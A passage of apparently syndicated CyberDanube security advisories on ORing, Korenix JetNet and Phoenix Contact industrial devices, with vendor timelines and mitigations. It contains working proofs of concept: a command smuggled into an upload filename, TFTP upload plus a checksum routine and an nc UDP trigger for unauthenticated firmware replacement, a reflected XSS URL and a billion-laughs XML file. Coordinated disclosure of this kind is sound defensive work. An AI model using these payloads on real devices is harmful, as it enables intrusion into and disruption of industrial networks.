Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=—————————347087158737672164432057801583
Content-Length: 563
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“upfile“; filename=“test.bin;ls${IFS}-la;“

—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“bt_upconf“

Upload
—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“lang“

en
—————————–347087158737672164432057801583
Content-Disposition: form-data; name=“ret_msg_upconf“

—————————–347087158737672164432057801583–

This request is equal to executing „ls -la“ on the console of the device.

HTTP/1.0 200 OK
tar: can’t open ‚/tmp/test.bin‘: No such file or directory
drwxr-xr-x 4 root root 1024 Mar 7 14:36 .
drwxr-xr-x 8 root root 1024 Jan 30 2024 ..
-rwxr-xr-x 1 root root 17572 Jan 30 2024 admin_config.cgi
-rwxr-xr-x 1 root root 17584 Jan 30 2024 admin_default.cgi
-rwxr-xr-x 1 root root 15984 Jan 30 2024 admin_fwup.cgi
-rwxr-xr-x 1 root root 12476 Jan 30 2024 admin_password.cgi
-rwxr-xr-x 1 root root 13164 Jan 30 2024 admin_restart.cgi
-rwxr-xr-x 1 root root 33336 Jan 30 2024 adv_filters.cgi
-rwxr-xr-x 1 root root 15032 Jan 30 2024 adv_misc.cgi
-rwxr-xr-x 1 root root 72168 Jan 30 2024 adv_rstp.cgi
-rwxr-xr-x 1 root root 6588 Jan 30 2024 backup_unit.cgi
[…]

The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.

Solution

None

Workaround

None

Recommendation

CyberDanube recommends Oring customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.


Contact Timeline

  • 2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply.
  • 2024-02-19: Asking for an update. No reply.
  • 2024-02-28: Asking for an update. No reply.
  • 2024-03-11: Searched for „cyber security manager“ on LinkedIn. Contacted him and got the answer, that the content should be sent to „support@oringnet.com“. Sent the advisory to this address directly.
  • 2024-03-20: Asking for an update. No reply.
  • 2024-04-10: Asking for an update. No reply.
  • 2024-04-30: Including support_us@oringnet.com. Asking for an update. No reply.
  • 2024-05-02: Including support_eu@oringnet.com. Asking for an update. No reply.
  • 2024-05-27: Sent information that the advisory will be published on 2024-05-28.
  • 2024-05-28: Public release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

]]>
[EN] Multiple Vulnerabilities in Korenix JetNet Series https://cyberdanube.com/de/en-multiple-vulnerabilities-in-korenix-jetnet-series/ Tue, 09 Jan 2024 09:57:47 +0000 https://cyberdanube.com/en/?p=4505

Title: Multiple Vulnerabilities
Product: Korenix JetNet Series
Vulnerable version: See „Vulnerable versions“
Fixed version: –
CVE: CVE-2023-5376, CVE-2023-5347
Impact: High
Homepage: https://www.korenix.com/
Found: 2023-08-31


Korenix JetNet series is prone to a unauthenticated firmware upgrade, which leads to remote code execution.

Vendor description

„Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […]. Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]“

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

Tested on emulated Korenix JetNet 5310G / v2.6

All vulnerable models/versions according to vendor:
JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)
JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3, 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3, 4508f-sw V2.3)
JetNet 5620G-4C V1.1
JetNet 5612GP-4F V1.2
JetNet 5612G-4F V1.2
JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)
JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0, 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)
JetNet 6628XP-4F-US V1.1
JetNet 6628X-4F-EU V1.0
JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)
JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0, 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0, 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)
JetNet 6910G-M12 HVDC V1.0
JetNet 7310G-V2 2.0
JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0, 7628XP-4F-EU V1.1
JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0
JetNet 7714G-M12 HVDC V1.0

Vulnerability overview

1) TFTP Without Authentication (CVE-2023-5376)
The available tftp service is accessable without user authentication. This allows the user to upload and download files to the restricted „/home“ folder.

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
A critical security vulnerability has been identified that may allow an unauthenticated attacker to compromise the integrity of a device or cause a denial of service (DoS) condition. This vulnerability resides in the firmware upgrade process of the affected system.

Proof of Concept

1) TFTP Without Authentication (CVE-2023-5376)

The Linux tftp client was used to upload a firmware to the absolute path „/home/firmware.bin“:

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)

Unauthenticated attackers can exploit this by uploading malicious firmware via TFTP and initializing the upgrade process with a crafted UDP packet on port 5010.

We came to the conclusion that the firmware image consists of multiple sections. Our interpretation of these can be seen below:

class FirmwarePart:
def init(self, name, offset, size):
self.name = name
self.offset = offset
self.size = size

firmware_parts = [
FirmwarePart(„uimage_header“, 0x0, 0x40),
FirmwarePart(„uimage_kernel“, 0x40, 0x3c54),
FirmwarePart(„gzip“, 0x3c94, 0x14a000 – 0x3c94),
FirmwarePart(„squashfs“, 0x14a000, 0x539000 – 0x14a000),
FirmwarePart(„metadata“, 0x539000, 5480448 – 0x539000),
]

The squashfs includes the rootfs. Metadata includes a 4 byte checksum which needs to be modified when repacked. During our analysis we observed that the checksum gets calculated over all sections except metadata. To test this vulnerability we reimplemented the checksum calculation at offset 0x9bdc in the binary „/bin/cmd-server2“:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int32_t check_file(const char* arg1) {
FILE* r0 = fopen(arg1, „rb“);

if (!r0) {
return 0xffffffff;
}

int32_t filechecksum = 0;
int32_t last_data_size = 0;
int32_t file_size = 0;
uint8_t data_buf[4096];
int32_t data_len = 1;

while (data_len > 0) {
data_len = fread(data_buf, 1, sizeof(data_buf), r0);

if (data_len == 0) {
break;
}

int32_t counter = 0;
while (counter < (data_len >> 2)) {
int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));
counter++;
filechecksum += byte_at_counter;
}

file_size += data_len;
last_data_size = data_len;
}

fclose(r0);

if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size – 0x14a
000) > 0x5ac000)) {
return 0xffffffff;
}

data_len = 0;
while (data_len < (last_data_size >> 2)) {
int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));
data_len++;
filechecksum -= r3_2;
}

return filechecksum;
}

int main(int argc, char* argv[]) {
if (argc != 2) {
printf(„Usage: %s <file_path>\n“, argv[0]);
return 1;
}

int32_t result = check_file(argv[1]);
printf(„0x%x\n“, result);

return 0;
}

After modifying and repacking the squashfs, we calculated the checksum, patched the required bytes in the metadata section (offset 0x11b-0x11e) and initilized the update process.

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

# echo -e „\x00\x00\x00\x1f\x00\x00\x00\x01\x01“ | nc -u $IP 5010

The output of the serial console can be observed below:

Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received
Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi
Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10
Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received
check firmware…
checksum=b2256313, inFileChecksum=b2256313
Firmware upgrading, don’t turn off the switch!
Begin erasing flash:
.
Write firmware.bin (5480448 Bytes) to flash:

Write finished…
Terminating child processes…
Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain
Jan 1 00:01:01 syslogd exiting
Firmware upgrade success!!
waiting for reboot command …….

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a proper patch is available (see „Workaround“ section).

Workaround

Beijer representatives provided the following workaround for mitigating the
vulnerabilities on devices of the JetNet series:

Login by terminal:

Switch# configure terminal

Switch(config)# service ipscan disable

Switch(config)# tftpd disable

Switch(config)# copy running-config startup-config

Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947

This commands should be used to deactivate the TFTP daemon on the device to
prevent unauthenticated actors from abusing the service.

Recommendation

Regardless to the current state of the vulnerability, CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.


Contact Timeline

  • 31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 31-08-2023: Receiving contact information. Send vulnerability information.
  • 26-09-2023: Asking about vulnerability status and receiving update release date.
  • 27-10-2023: Received update from contact regarding the firmware update.
  • 29-11-2023: Meeting with contact stating that it effects the whole series.
  • 31-11-2023: Meeting to discuss potential solutions.
  • 11-12-2023: Release delayed due to lack of workaround from manufacturer.
  • 21-12-2023: Manufacturer provides workaround. Release date confirmed.
  • 09-01-2024: Coordinated release of security advisory.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems,  firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

]]>
[EN] St. Pölten UAS | Multiple Vulnerabilities in Phoenix Contact TC Cloud Client, TC Router & Cloud Client https://cyberdanube.com/de/en-st-polten-uas-multiple-vulnerabilities-in-phoenix-contact-tc-cloud-client-tc-router-cloud-client/ Tue, 08 Aug 2023 09:52:07 +0000 https://cyberdanube.com/en/?p=4402

Title: Multiple Vulnerabilities
Product: Phoenix Contact TC Cloud Client 1002-4G*, TC Router 3002T-4G, Cloud Client 1101T-TX/TX
Vulnerable version: <2.07.2, <2.07.2, <2.06.10
Fixed version: 2.07.2, 2.07.2, 2.06.10
CVE: CVE-2023-3526, CVE-2023-3569
Impact: Medium
Homepage: https://www.phoenixcontact.com/
Found: 2023-05-04
By: A. Resanovic, S. Stockinger, T. Etzenberger

Disclaimer: This vulnerability was discovery during research at St. Pölten UAS, supported and coordinated by CyberDanube.


Phoenix Contact TC Cloud Client, TC Router & Cloud Client are prone to a Stored Cross-Site Scripting (XSS) and Billion laughs attack.

Vendor description

At Phoenix Contact, our approach is innovative, sustainable, and based on partnership. This applies to how we deal with employees as well as with our customers. We are also conscious of our social and environmental responsibility and we act accordingly. With the vision of the All Electric Society, we also want to empower our customers to act more sustainably by enabling the comprehensive electrification, networking, and automation of all sectors of the economy and infrastructure with our products and solutions.

Source: https://www.phoenixcontact.com/en-us/ueber-uns

Vulnerable versions

TC Router 3002T-4G* / <2.0.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

Vulnerability overview

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggerd in the license viewer of the device. This can be used to execute malicious code in the context of a user’s browser. Cookies may be also stoled via this way.

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569
By abusing the configuration file upload functionality of the device, it is possible to slow down all other processes.

Proof of Concept

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526

The reflected cross-site scripting vulnerability can be triggered by using the following GET request:

https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15″><script>alert(„document.cookie“)</script>

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569

The following configuration file can be used to exploit the binary

„/usr/bin/xmlconfig“, which supportes entity reference nodes:
===============================================================================
<?xml version=“1.0″?>
<!DOCTYPE lolz [
<!ENTITY lol „lol“>
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 „&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;“>
<!ENTITY lol2
„&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;“>
<!ENTITY lol3
„&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;“>
<!ENTITY lol4
„&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;“>
<!ENTITY lol5
„&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;“>
<!ENTITY lol6
„&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;“>
<!ENTITY lol7
„&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;“>
<!ENTITY lol8
„&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;“>
<!ENTITY lol9
„&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;“>
]>
<lolz>&lol9;</lolz>
===============================================================================

Approach

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update to the latest available firmware version.

Workaround

None.

Recommendation

CyberDanube recommends Phoenix Contact customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2023-05-16: Contacting vendor via psirt@phoenixcontact.com
  • 2023-05-17: Vendor informed internal product team.
  • 2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
  • 2023-05-19: Vendor needs more time to fix the issues.
  • 2023-06-15: Vendor asked for an explaination of the issues as he cannot reproduce them; Sent screenshots and more PoCs to the vendor.
    Offered an MS Teams call to clarify the issues.
  • 2023-06-16: Scheduled a call for 2023-06-19.
  • 2023-06-19: Clarified issues and further timeline for the coordination. Vendor proposed to release the firmware on 2023-07-13.
  • 2023-07-04: Contact stated that he has to shift the release after July. It will be released on 08.08.2023; Confirmed the date.
  • 2023-07-13: Received CVE numbers from vendor.
  • 2023-07-18: Received firmware versions from vendor.
  • 2023-07-23:_Vendor released firmwares.
  • 2023-08-08: Coordinated release of security advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

]]>